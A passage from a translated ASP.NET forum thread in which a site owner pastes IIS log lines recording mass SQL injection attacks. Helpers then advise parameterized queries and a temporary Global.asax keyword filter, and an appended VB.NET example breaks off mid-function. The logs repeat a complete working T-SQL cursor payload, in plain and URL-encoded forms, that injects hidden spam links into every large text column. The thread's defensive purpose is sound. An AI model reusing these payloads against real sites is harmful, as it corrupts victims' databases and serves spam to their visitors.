Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3498 0
2015-02-23 17:26:20 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2200 0
2015-02-23 17:26:27 GET /info.aspx infoid=20';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3244 0
2015-02-23 17:26:27 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2052 0
2015-02-23 17:26:43 GET /info.aspx infoid=20;declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 32146 3241 14140
2015-02-23 17:26:46 GET /info.aspx infoid=20);declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3244 31
2015-02-23 17:26:46 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2052 0
2015-02-23 17:26:47 GET /info.aspx infoid=20');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3247 0
2015-02-23 17:26:47 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2054 0
2015-02-23 17:28:48 GET /pictures/object_1231.jpg - 5.164.109.62 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.115+Safari/537.36 http://mufflesniall.blogspot.ru/2012/12/blog-post_8206.html www.site.ru 200 85171 488 15
 
Answer # 18 · date added: 24.02.2015 / 13:01
Answer author: Алексей Немиро


The vulnerabilities should have been closed...

Or at least put a filter in Global.asax (closing them is better).
> In the log files, among other things, I found lines that I could not make sense of; please take a look. What could this mean?
Or is it only in the logs, while everything in the database is fine?
If so, all kinds of bots are constantly probing for vulnerabilities and it is not worth paying attention to this.
 
Answer # 19 · date added: 24.02.2015 / 16:16
Answer author: anka_x


Good afternoon.

Thank you, Aleksey.

Unfortunately, I'm not smart enough to implement parameterized queries. )

The database is in bad shape: he fouls it up faster than I can clean it out...

I noticed that the additions only end up in nvarchar(MAX) fields, while the old ntext fields are all clean. I read that ntext is going to be dropped. Is it worth converting the fields to ntext?

Is there some way to catch all Request.QueryString("***") values, even ones I don't use, that are longer than is reasonable? :)

I tried filtering by IP, but he changes IP...

And what kind of filter in Global.asax could help?
 
Answer # 20 · date added: 24.02.2015 / 17:45
Answer author: Алексей Немиро


> Unfortunately, I'm not smart enough to implement parameterized queries. )
All you need there is to add @имяПараметра to the queries and then supply the value:
'AddWithValue creates the parameter and assigns its value in one call
cmd.Parameters.AddWithValue("@имяПараметра", 123)
> And what kind of filter in Global.asax could help?
I think I have already shown something like this somewhere. You need to handle the Application_BeginRequest event:
Sub Application_BeginRequest()
  If Request.QueryString.ToString().ToLower().IndexOf("update") <> -1 Then
     'the query string contains UPDATE
     'you can filter on fragments of SQL statements in the query string
     Response.StatusCode = 403
     Response.End()
     'or throw an exception instead of the two lines above:
     'Throw New Exception("Текст какой-то ошибки!")
  End If
End Sub
But it is better to close the holes, because a method like this will slow the site down and the filter may wrongly react to normal requests.
It can only be used as a temporary solution.
> I read that ntext is going to be dropped. Is it worth converting the fields to ntext?
(n)varchar(MAX) is more convenient. If the need arises, you can convert. For example, searching with LIKE in (n)text fields, if memory serves, does not work, unlike in (n)varchar.
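
Added example (not code from the thread or its authors): what "add @имяПараметра and supply the value" looks like for the `infoid` parameter seen in the log, with the concatenated query beside the parameterized one. It also binds User-Agent and Referer as parameters, because the logged requests carry the same payload in those headers. The `Info` and `VisitLog` tables, their columns and the connection string are assumptions.

```vb
Imports System
Imports System.Data
Imports System.Data.SqlClient
Imports System.Globalization

' Added example, not code from the thread. The Info and VisitLog tables, their
' columns and the connection string are assumptions made for illustration.
Public Module InfoQueries

    ' BEFORE (vulnerable pattern): the raw query-string value becomes SQL text,
    ' so everything after "20" in the logged requests is parsed as statements.
    Public Function BuildQueryUnsafe(ByVal rawInfoId As String) As String
        Return "SELECT Title, Body FROM Info WHERE InfoId = " & rawInfoId
    End Function

    ' infoid is meant to be a number: accept plain digits only, nothing else.
    Public Function TryParseInfoId(ByVal raw As String, ByRef infoId As Integer) As Boolean
        infoId = 0
        If String.IsNullOrEmpty(raw) OrElse raw.Length > 9 Then Return False
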